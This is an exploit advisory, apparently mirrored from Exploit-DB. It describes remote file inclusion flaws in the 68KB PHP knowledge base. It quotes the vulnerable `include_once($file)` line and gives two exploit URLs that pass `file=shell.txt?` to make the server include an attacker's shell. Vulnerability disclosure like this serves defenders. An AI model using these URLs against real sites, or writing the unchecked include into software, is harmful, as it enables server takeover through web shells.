68KB – Multiple Remote File Inclusions - 体验盒子

作者： ITSecTeam

日期： 2010-03-27

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11904/

===========================================================================
( #Topic : 68kb
( #Bug type : multi remote file include
( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!


vul:===================================================================
path/themes/front/default/modules/show.php
<?php include_once($file); ?>
vul:===================================================================
path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
---------------------------------------------------------------------
exploit:================================================================

path/themes/front/default/modules/show.php?file=shell.txt?
path/themes/admin/default/modules/show.php?file=shell.txt?

--------------------------------------